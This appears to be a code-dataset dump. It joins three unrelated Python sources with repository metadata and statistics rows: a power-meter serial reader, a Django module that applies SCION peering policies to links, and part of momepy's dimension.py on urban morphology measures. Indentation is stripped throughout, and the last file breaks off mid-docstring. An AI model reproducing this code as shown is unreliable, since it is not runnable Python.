return float(self._parse_line_str(cleaned_line))
except ValueError:
return None
class SingleCounter:
_prev_reading: Optional[float]
_prev_was_edge: bool
power: Optional[float]
power_from_ts: Optional[float]
power_to_ts: Optional[float]
def __init__(self):
self._prev_reading = None
self._prev_was_edge = False
self.power = None
self.power_from_ts = None
self.power_to_ts = None
def update(self, reading_kwh: Optional[float], reading_ts: float, min_averaging_secs: float,
other_counter: SingleCounter):
if reading_kwh is not None \
and self._prev_reading != reading_kwh \
and (self.power_to_ts is None or (reading_ts - self.power_to_ts) >= min_averaging_secs):
if self._prev_was_edge and self.power_to_ts is not None:
self.power = (reading_kwh - self._prev_reading) * 3.6e6 / \
(reading_ts - self.power_to_ts)
self.power_from_ts = self.power_to_ts
other_counter.power = 0
other_counter.power_from_ts = self.power_from_ts
other_counter._prev_was_edge = True
if self._prev_reading is not None:
self._prev_was_edge = True
self._prev_reading = reading_kwh
self.power_to_ts = reading_ts
class PowerMeterApatorEC3Repeating:
min_averaging_secs: float
_power_meter: PowerMeterApatorEC3
_timer: RepeatTimer
reading: Optional[PowerMeterReading]
reading_ts: Optional[float]
success: bool
high: SingleCounter
low: SingleCounter
callbacks: List[Callable[[Optional[PowerMeterReading]], None]]
def __init__(self, power_meter: PowerMeterApatorEC3, interval: float, min_averaging_secs: float):
self.min_averaging_secs = min_averaging_secs
self._power_meter = power_meter
self._timer = RepeatTimer(interval, self._acquire)
self.reading = None
self.reading_ts = None
self.success = False
self.high = SingleCounter()
self.low = SingleCounter()
self.callbacks = []
def add_callback(self, callback: Callable[[Optional[PowerMeterReading]], None]):
self.callbacks.append(callback)
def start(self):
if not self._timer.is_alive():
self._timer.start()
def stop(self):
self._timer.cancel()
self._power_meter.close()
def _acquire(self):
try:
ts = time.time()
self.reading = self._power_meter.read()
self.reading_ts = ts
self._update_high_power()
self._update_low_power()
self.success = True
except SerialException:
self.success = False
self._fire()
def _update_low_power(self):
self.low.update(self.reading.consumption_low_sum_kwh, self.reading_ts, self.min_averaging_secs, self.high)
def _update_high_power(self):
self.high.update(self.reading.consumption_high_sum_kwh, self.reading_ts, self.min_averaging_secs, self.low)
def _fire(self):
for callback in self.callbacks:
callback(self.reading)
if __name__ == '__main__':
pm = PowerMeterApatorEC3Repeating(PowerMeterApatorEC3("COM5"), 30, 10)
pm.callbacks.append(lambda r: print(pm.success, r, pm.reading_ts, pm.low.power, pm.high.power))
pm.start()
| 33.314286 | 115 | 0.636364 | 1,004 | 8,162 | 4.947211 | 0.231076 | 0.034226 | 0.014496 | 0.018321 | 0.151399 | 0.057177 | 0.031005 | 0.017314 | 0.017314 | 0.017314 | 0 | 0.011017 | 0.277138 | 8,162 | 244 | 116 | 33.45082 | 0.830847 | 0.165523 | 0 | 0.11875 | 0 | 0 | 0.042166 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1125 | false | 0 | 0.04375 | 0 | 0.35625 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b2ed7cd64ff69161aa71d32d7a5abf6638b0c2 | 6,939 | py | Python | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | """Functions for updating links according to peering policies"""
from django.db import transaction
from django.db.models import Q, QuerySet
from peering_coord.api.client_connection import ClientRegistry
from peering_coord.api.peering_pb2 import AsyncError
from peering_coord.models.ixp import VLAN, Interface, Owner
from peering_coord.models.policies import (
AsPeerPolicy, DefaultPolicy, IsdPeerPolicy, OwnerPeerPolicy)
from peering_coord.models.scion import AS, AcceptedPeer, Link
@transaction.atomic
def update_accepted_peers(vlan: VLAN, asys: AS) -> None:
"""Update the AcceptedPeer relation of ASes accepted for peering.
:param vlan: Peering VLAN to update.
:param asys: AS whose accepted peers are updated.
"""
old = AcceptedPeer.objects.filter(vlan=vlan, asys=asys).values_list('peer_id')
new = _get_accepted_peers(vlan, asys)
# Calculate which peers to add/remove.
remove = old.difference(new)
add = new.difference(old)
# Remove peers which are no longer accepted.
AcceptedPeer.objects.filter(vlan=vlan, asys=asys, peer_id__in=remove).delete()
# Add peers which are not accepted at the moment.
AcceptedPeer.objects.bulk_create(
AcceptedPeer(vlan=vlan, asys=asys, peer_id=peer[0]) for peer in add)
def _get_accepted_peers(vlan: VLAN, asys: AS) -> QuerySet:
"""Get the set of ASes `asys` accepts for peering.
:param vlan: Peering VLAN considered by the query.
:param asys: AS whose potential peers are retrieved.
:returns: A `QuerySet` of AS primary keys as returned by `values_list`.
"""
# AS-level policies
as_accept = AsPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_as_id')
as_reject = AsPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_as_id')
# Owner-level policies
org_accept = Owner.objects.filter(
id__in=OwnerPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_owner_id'))
org_reject = Owner.objects.filter(
id__in=OwnerPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_owner_id'))
# ISD-level policies
isd_accept = IsdPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_isd_id')
isd_reject = IsdPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_isd_id')
# Put it all together
# Note: The same AS/Owner/ISD cannot be accepted *and* rejected at the same time.
as_accepted_by_org = AS.objects.filter(
Q(owner_id__in=org_accept) & ~Q(id=asys.id)).values_list('id')
as_rejected_by_org = AS.objects.filter(
Q(owner_id__in=org_reject) & ~Q(id=asys.id)).values_list('id')
as_accepted_by_isd = AS.objects.filter(
Q(isd_id__in=isd_accept) & ~Q(id=asys.id)).values_list('id')
accept = as_accept.union(
as_accepted_by_org.difference(as_reject),
as_accepted_by_isd.difference(as_rejected_by_org, as_reject)
)
# Handle default accept policy
if DefaultPolicy.objects.filter(vlan=vlan, asys=asys, accept=True).exists():
as_rejected_by_isd = AS.objects.filter(
Q(isd_id__in=isd_reject) & ~Q(id=asys.id)).values_list('id')
as_all = vlan.members.values_list('asys', flat=True).filter(~Q(asys=asys.id)).distinct()
accept = accept.union(as_all.difference(as_rejected_by_isd, as_rejected_by_org, as_reject))
return accept
@transaction.atomic
def update_links(vlan: VLAN, asys: AS) -> None:
"""Create and delete links of the given AS to reflect the peering accepted by it and its peers.
Uses accepted peerings from AcceptedPeer relation instead of evaluating the peering policies
directly. update_accepted_peers() must be called on every ASes whose policies have changed for
this function to get up-to-date data.
:param vlan: Peering VLAN to update.
:param asys: AS whose links are updated.
"""
# Get currently connected ASes.
peers_old = asys.query_connected_peers(vlan=vlan)
# Get ASes that should be connected.
peers_new = asys.query_mutually_accepted_peers(vlan=vlan)
# Calculate which links to add/remove.
remove = peers_old.difference(peers_new)
add = peers_new.difference(peers_old)
# Remove old links.
Link.objects.filter(
Q(interface_a__vlan=vlan) # both interfaces are always in the same VLAN
& (Q(interface_a__peering_client__asys=asys, interface_b__peering_client__asys__in=remove)
| Q(interface_a__peering_client__asys__in=remove, interface_b__peering_client__asys=asys))
).delete()
# Add new links.
for peer_id in add:
peer = AS.objects.get(id=peer_id[0])
_create_links(vlan, asys, peer)
def _create_links(vlan: VLAN, as_a: AS, as_b: AS):
"""Create links between all interfaces of `as_a` and `as_b` in `vlan`.
The link type is determined from the AS types.
"""
# Figure out which link type to use.
if as_a.is_core and as_b.is_core:
link_type = Link.Type.CORE
elif not as_a.is_core and not as_b.is_core:
link_type = Link.Type.PEERING
elif as_a.isd == as_b.isd:
link_type = Link.Type.PROVIDER
if not as_a.is_core and as_b.is_core:
as_a, as_b = as_b, as_a
else:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Cannot create a link between ASes {} and {} of incompatible type.".format(
as_a, as_b
)
ClientRegistry.send_async_error(as_a.asn, error)
ClientRegistry.send_async_error(as_b.asn, error)
return
for interface_a in as_a.query_interfaces().filter(vlan=vlan).all():
for interface_b in as_b.query_interfaces().filter(vlan=vlan).all():
port_a = port_b = None
try:
port_a = interface_a.get_unused_port()
except Interface.NoUnusedPorts:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Allocated port range is exhausted on interface {}.".format(
interface_a)
ClientRegistry.send_async_error(as_a.asn, error)
try:
port_b = interface_b.get_unused_port()
except Interface.NoUnusedPorts:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Allocated port range is exhausted on interface {}.".format(
interface_b)
ClientRegistry.send_async_error(as_b.asn, error)
if port_a and port_b:
Link.objects.create(link_type,
interface_a=interface_a, interface_b=interface_b,
port_a=port_a, port_b=port_b)
| 40.817647 | 99 | 0.683816 | 978 | 6,939 | 4.616564 | 0.175869 | 0.033666 | 0.034552 | 0.035437 | 0.442082 | 0.407309 | 0.339092 | 0.32093 | 0.245183 | 0.223034 | 0 | 0.000555 | 0.221646 | 6,939 | 169 | 100 | 41.059172 | 0.835401 | 0.213143 | 0 | 0.194175 | 0 | 0 | 0.047059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.067961 | 0 | 0.126214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b55411280b2c91c5d8253412bafa1ca94c9a7f | 33,900 | py | Python | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | 1 | 2021-06-19T05:41:30.000Z | 2021-06-19T05:41:30.000Z | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | null | null | null | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# dimension.py
# definitions of dimension characters
import math
import numpy as np
import pandas as pd
import scipy as sp
from shapely.geometry import LineString, Point, Polygon
from tqdm import tqdm
from .shape import _make_circle
__all__ = [
"Area",
"Perimeter",
"Volume",
"FloorArea",
"CourtyardArea",
"LongestAxisLength",
"AverageCharacter",
"StreetProfile",
"WeightedCharacter",
"CoveredArea",
"PerimeterWall",
"SegmentsLength",
]
class Area:
"""
Calculates area of each object in given GeoDataFrame. It can be used for any
suitable element (building footprint, plot, tessellation, block).
It is a simple wrapper for GeoPandas ``.area`` for the consistency of momepy.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
>>> buildings['area'] = momepy.Area(buildings).series
>>> buildings.area[0]
728.5574947044363
"""
def __init__(self, gdf):
self.gdf = gdf
self.series = self.gdf.geometry.area
class Perimeter:
"""
Calculates perimeter of each object in given GeoDataFrame. It can be used for any
suitable element (building footprint, plot, tessellation, block).
It is a simple wrapper for GeoPandas ``.length`` for the consistency of momepy.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
>>> buildings['perimeter'] = momepy.Perimeter(buildings).series
>>> buildings.perimeter[0]
137.18630991119903
"""
def __init__(self, gdf):
self.gdf = gdf
self.series = self.gdf.geometry.length
class Volume:
"""
Calculates volume of each object in given GeoDataFrame based on its height and area.
.. math::
area * height
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
heights : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
heights : Series
Series containing used heights values
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['volume'] = momepy.Volume(buildings, heights='height_col').series
>>> buildings.volume[0]
7285.5749470443625
>>> buildings['volume'] = momepy.Volume(buildings, heights='height_col', areas='area_col').series
>>> buildings.volume[0]
7285.5749470443625
"""
def __init__(self, gdf, heights, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if not isinstance(heights, str):
gdf["mm_h"] = heights
heights = "mm_h"
self.heights = gdf[heights]
if areas is not None:
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
else:
self.areas = gdf.geometry.area
try:
self.series = self.areas * self.heights
except KeyError:
raise KeyError(
"ERROR: Column not found. Define heights and areas or set areas to None."
)
class FloorArea:
"""
Calculates floor area of each object based on height and area.
Number of floors is simplified into formula height / 3
(it is assumed that on average one floor is approximately 3 metres)
.. math::
area * \\frac{height}{3}
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
heights : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
heights : Series
Series containing used heights values
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col').series
Calculating floor areas...
Floor areas calculated.
>>> buildings.floor_area[0]
2185.672484113309
>>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col', areas='area_col').series
>>> buildings.floor_area[0]
2185.672484113309
"""
def __init__(self, gdf, heights, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if not isinstance(heights, str):
gdf["mm_h"] = heights
heights = "mm_h"
self.heights = gdf[heights]
if areas is not None:
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
else:
self.areas = gdf.geometry.area
try:
self.series = self.areas * (self.heights // 3)
except KeyError:
raise KeyError(
"ERROR: Column not found. Define heights and areas or set areas to None."
)
class CourtyardArea:
"""
Calculates area of holes within geometry - area of courtyards.
Ensure that your geometry is ``shapely.geometry.Polygon``.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['courtyard_area'] = momepy.CourtyardArea(buildings).series
>>> buildings.courtyard_area[80]
353.33274206543274
"""
def __init__(self, gdf, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if areas is None:
areas = gdf.geometry.area
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
exts = gdf.geometry.apply(lambda g: Polygon(g.exterior))
self.series = pd.Series(exts.area - gdf[areas], index=gdf.index)
# calculate the radius of circumcircle
def _longest_axis(points):
circ = _make_circle(points)
return circ[2] * 2
class LongestAxisLength:
"""
Calculates the length of the longest axis of object.
Axis is defined as a diameter of minimal circumscribed circle around the convex hull.
It does not have to be fully inside an object.
.. math::
\\max \\left\\{d_{1}, d_{2}, \\ldots, d_{n}\\right\\}
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings['lal'] = momepy.LongestAxisLength(buildings).series
>>> buildings.lal[0]
40.2655616057102
"""
def __init__(self, gdf):
self.gdf = gdf
hulls = gdf.geometry.convex_hull
self.series = hulls.apply(lambda hull: _longest_axis(hull.exterior.coords))
class AverageCharacter:
"""
Calculates the average of a character within a set neighbourhood defined in ``spatial_weights``
Average value of the character within a set neighbourhood defined in ``spatial_weights``.
Can be set to ``mean``, ``median`` or ``mode``. ``mean`` is defined as:
.. math::
\\frac{1}{n}\\left(\\sum_{i=1}^{n} value_{i}\\right)
Adapted from :cite:`hausleitner2017`.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing morphological tessellation
values : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored character value.
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
spatial_weights : libpysal.weights
spatial weights matrix
rng : Two-element sequence containing floats in range of [0,100], optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The order of the elements is not important.
mode : str (default 'all')
mode of average calculation. Can be set to `all`, `mean`, `median` or `mode` or
list of any of the options.
Attributes
----------
series : Series
Series containing resulting mean values
mean : Series
Series containing resulting mean values
median : Series
Series containing resulting median values
mode : Series
Series containing resulting mode values
gdf : GeoDataFrame
original GeoDataFrame
values : GeoDataFrame
Series containing used values
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
rng : tuple
range
modes : str
mode
Examples
--------
>>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation, threshold=100, silence_warnings=True, ids='uID')
>>> tessellation['mean_area'] = momepy.AverageCharacter(tessellation, values='area', spatial_weights=sw, unique_id='uID').mean
100%|██████████| 144/144 [00:00<00:00, 1433.32it/s]
>>> tessellation.mean_area[0]
4823.1334436678835
"""
def __init__(self, gdf, values, spatial_weights, unique_id, rng=None, mode="all"):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
self.rng = rng
self.modes = mode
if rng:
from momepy import limit_range
data = gdf.copy()
if values is not None:
if not isinstance(values, str):
data["mm_v"] = values
values = "mm_v"
self.values = data[values]
data = data.set_index(unique_id)[values]
means = []
medians = []
modes = []
allowed = ["mean", "median", "mode"]
if mode == "all":
mode = allowed
elif isinstance(mode, list):
for m in mode:
if m not in allowed:
raise ValueError("{} is not supported as mode.".format(mode))
elif isinstance(mode, str):
if mode not in allowed:
raise ValueError("{} is not supported as mode.".format(mode))
mode = [mode]
for index in tqdm(data.index, total=data.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
values_list = data.loc[neighbours]
if rng:
values_list = limit_range(values_list, rng=rng)
if "mean" in mode:
means.append(np.mean(values_list))
if "median" in mode:
medians.append(np.median(values_list))
if "mode" in mode:
modes.append(sp.stats.mode(values_list)[0][0])
else:
if "mean" in mode:
means.append(np.nan)
if "median" in mode:
medians.append(np.nan)
if "mode" in mode:
modes.append(np.nan)
if "mean" in mode:
self.series = self.mean = pd.Series(means, index=gdf.index)
if "median" in mode:
self.median = pd.Series(medians, index=gdf.index)
if "mode" in mode:
self.mode = pd.Series(modes, index=gdf.index)
class StreetProfile:
"""
Calculates the street profile characters.
Returns a dictionary with widths, standard deviation of width, openness, heights,
standard deviation of height and ratio height/width. Algorithm generates perpendicular
lines to ``right`` dataframe features every ``distance`` and measures values on intersection
with features of ``left``. If no feature is reached within
``tick_length`` its value is set as width (being a theoretical maximum).
Derived from :cite:`araldi2019`.
Parameters
----------
left : GeoDataFrame
GeoDataFrame containing streets to analyse
right : GeoDataFrame
GeoDataFrame containing buildings along the streets (only Polygon geometry type is supported)
heights: str, list, np.array, pd.Series (default None)
the name of the buildings dataframe column, ``np.array``, or ``pd.Series`` where is stored building height. If set to None,
height and ratio height/width will not be calculated.
distance : int (default 10)
distance between perpendicular ticks
tick_length : int (default 50)
length of ticks
Attributes
----------
w : Series
Series containing street profile width values
wd : Series
Series containing street profile standard deviation values
o : Series
Series containing street profile openness values
h : Series
Series containing street profile heights values. Returned only when heights is set.
hd : Series
Series containing street profile heights standard deviation values. Returned only when heights is set.
p : Series
Series containing street profile height/width ratio values. Returned only when heights is set.
left : GeoDataFrame
original left GeoDataFrame
right : GeoDataFrame
original right GeoDataFrame
distance : int
distance between perpendicular ticks
tick_length : int
length of ticks
heights : GeoDataFrame
Series containing used height values
Examples
--------
>>> street_profile = momepy.StreetProfile(streets_df, buildings_df, heights='height')
100%|██████████| 33/33 [00:02<00:00, 15.66it/s]
>>> streets_df['width'] = street_profile.w
>>> streets_df['deviations'] = street_profile.wd
"""
def __init__(self, left, right, heights=None, distance=10, tick_length=50):
self.left = left
self.right = right
self.distance = distance
self.tick_length = tick_length
if heights is not None:
if not isinstance(heights, str):
right = right.copy()
right["mm_h"] = heights
heights = "mm_h"
self.heights = right[heights]
sindex = right.sindex
results_list = []
deviations_list = []
heights_list = []
heights_deviations_list = []
openness_list = []
for idx, row in tqdm(left.iterrows(), total=left.shape[0]):
# list to hold all the point coords
list_points = []
# set the current distance to place the point
current_dist = distance
# make shapely MultiLineString object
shapely_line = row.geometry
# get the total length of the line
line_length = shapely_line.length
# append the starting coordinate to the list
list_points.append(Point(list(shapely_line.coords)[0]))
# https://nathanw.net/2012/08/05/generating-chainage-distance-nodes-in-qgis/
# while the current cumulative distance is less than the total length of the line
while current_dist < line_length:
# use interpolate and increase the current distance
list_points.append(shapely_line.interpolate(current_dist))
current_dist += distance
# append end coordinate to the list
list_points.append(Point(list(shapely_line.coords)[-1]))
ticks = []
for num, pt in enumerate(list_points, 1):
# start chainage 0
if num == 1:
angle = self._getAngle(pt, list_points[num])
line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
angle = self._getAngle(line_end_1, pt)
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
ticks.append([tick1, tick2])
# everything in between
if num < len(list_points) - 1:
angle = self._getAngle(pt, list_points[num])
line_end_1 = self._getPoint1(
list_points[num], angle, tick_length / 2
)
angle = self._getAngle(line_end_1, list_points[num])
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString(
[
(line_end_1.x, line_end_1.y),
(list_points[num].x, list_points[num].y),
]
)
tick2 = LineString(
[
(line_end_2.x, line_end_2.y),
(list_points[num].x, list_points[num].y),
]
)
ticks.append([tick1, tick2])
# end chainage
if num == len(list_points):
angle = self._getAngle(list_points[num - 2], pt)
line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
angle = self._getAngle(line_end_1, pt)
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
ticks.append([tick1, tick2])
# widths = []
m_heights = []
lefts = []
rights = []
for duo in ticks:
for ix, tick in enumerate(duo):
possible_intersections_index = list(
sindex.intersection(tick.bounds)
)
possible_intersections = right.iloc[possible_intersections_index]
real_intersections = possible_intersections.intersects(tick)
get_height = right.loc[list(real_intersections.index)]
possible_int = get_height.exterior.intersection(tick)
if not possible_int.is_empty.all():
true_int = []
for one in list(possible_int.index):
if possible_int[one].type == "Point":
true_int.append(possible_int[one])
elif possible_int[one].type == "MultiPoint":
for p in possible_int[one]:
true_int.append(p)
if len(true_int) > 1:
distances = []
ix = 0
for p in true_int:
dist = p.distance(Point(tick.coords[-1]))
distances.append(dist)
ix = ix + 1
minimal = min(distances)
if ix == 0:
lefts.append(minimal)
else:
rights.append(minimal)
else:
if ix == 0:
lefts.append(
true_int[0].distance(Point(tick.coords[-1]))
)
else:
rights.append(
true_int[0].distance(Point(tick.coords[-1]))
)
if heights is not None:
indices = {}
for idx, row in get_height.iterrows():
dist = row.geometry.distance(Point(tick.coords[-1]))
indices[idx] = dist
minim = min(indices, key=indices.get)
m_heights.append(right.loc[minim][heights])
openness = (len(lefts) + len(rights)) / len(ticks * 2)
openness_list.append(1 - openness)
if rights and lefts:
results_list.append(2 * np.mean(lefts + rights))
deviations_list.append(np.std(lefts + rights))
elif not lefts and rights:
results_list.append(2 * np.mean([np.mean(rights), tick_length / 2]))
deviations_list.append(np.std(rights))
elif not rights and lefts:
results_list.append(2 * np.mean([np.mean(lefts), tick_length / 2]))
deviations_list.append(np.std(lefts))
else:
results_list.append(tick_length)
deviations_list.append(0)
if heights is not None:
if m_heights:
heights_list.append(np.mean(m_heights))
heights_deviations_list.append(np.std(m_heights))
else:
heights_list.append(0)
heights_deviations_list.append(0)
self.w = pd.Series(results_list, index=left.index)
self.wd = pd.Series(deviations_list, index=left.index)
self.o = pd.Series(openness_list, index=left.index)
if heights is not None:
self.h = pd.Series(heights_list, index=left.index)
self.hd = pd.Series(heights_deviations_list, index=left.index)
self.p = self.h / self.w
# http://wikicode.wikidot.com/get-angle-of-line-between-two-points
# https://glenbambrick.com/tag/perpendicular/
# angle between two points
def _getAngle(self, pt1, pt2):
x_diff = pt2.x - pt1.x
y_diff = pt2.y - pt1.y
return math.degrees(math.atan2(y_diff, x_diff))
# start and end points of chainage tick
# get the first end point of a tick
def _getPoint1(self, pt, bearing, dist):
angle = bearing + 90
bearing = math.radians(angle)
x = pt.x + dist * math.cos(bearing)
y = pt.y + dist * math.sin(bearing)
return Point(x, y)
# get the second end point of a tick
def _getPoint2(self, pt, bearing, dist):
bearing = math.radians(bearing)
x = pt.x + dist * math.cos(bearing)
y = pt.y + dist * math.sin(bearing)
return Point(x, y)
class WeightedCharacter:
"""
Calculates the weighted character
Character weighted by the area of the objects within ``k`` topological steps defined in ``spatial_weights``.
.. math::
\\frac{\\sum_{i=1}^{n} {character_{i} * area_{i}}}{\\sum_{i=1}^{n} area_{i}}
Adapted from :cite:`dibble2017`.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
values : str, list, np.array, pd.Series
the name of the gdf dataframe column, ``np.array``, or ``pd.Series`` where is stored character to be weighted
spatial_weights : libpysal.weights
spatial weights matrix - If None, Queen contiguity matrix of set order will be calculated
based on left.
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
areas : str, list, np.array, pd.Series (default None)
the name of the left dataframe column, ``np.array``, or ``pd.Series`` where is stored area value
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
values : GeoDataFrame
Series containing used values
areas : GeoDataFrame
Series containing used areas
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
Examples
--------
>>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation_df, threshold=100, silence_warnings=True)
>>> buildings_df['w_height_100'] = momepy.WeightedCharacter(buildings_df, values='height', spatial_weights=sw,
unique_id='uID').series
100%|██████████| 144/144 [00:00<00:00, 361.60it/s]
"""
def __init__(self, gdf, values, spatial_weights, unique_id, areas=None):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
data = gdf.copy()
if areas is None:
areas = gdf.geometry.area
if not isinstance(areas, str):
data["mm_a"] = areas
areas = "mm_a"
if not isinstance(values, str):
data["mm_vals"] = values
values = "mm_vals"
self.areas = data[areas]
self.values = data[values]
data = data.set_index(unique_id)[[values, areas]]
results_list = []
for index in tqdm(data.index, total=data.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
subset = data.loc[neighbours]
results_list.append(
(sum(subset[values] * subset[areas])) / (sum(subset[areas]))
)
else:
results_list.append(np.nan)
self.series = pd.Series(results_list, index=gdf.index)
class CoveredArea:
"""
Calculates the area covered by neighbours
Total area covered by neighbours defined in ``spatial_weights`` and element itself.
.. math::
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing Polygon geometry
spatial_weights : libpysal.weights
spatial weights matrix
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
Examples
--------
>>> sw = momepy.sw_high(k=3, gdf=tessellation_df, ids='uID')
>>> tessellation_df['covered3steps'] = mm.CoveredArea(tessellation_df, sw, 'uID').series
100%|██████████| 144/144 [00:00<00:00, 549.15it/s]
"""
def __init__(self, gdf, spatial_weights, unique_id):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
data = gdf
area = data.set_index(unique_id).geometry.area
results_list = []
for index in tqdm(area.index, total=area.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
areas = area.loc[neighbours]
results_list.append(sum(areas))
else:
results_list.append(np.nan)
self.series = pd.Series(results_list, index=gdf.index)
class PerimeterWall:
"""
Calculate the perimeter wall length the joined structure.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
spatial_weights : libpysal.weights, optional
spatial weights matrix - If None, Queen contiguity matrix will be calculated
based on gdf. It is to denote adjacent buildings (note: based on index, not ID).
Attributes
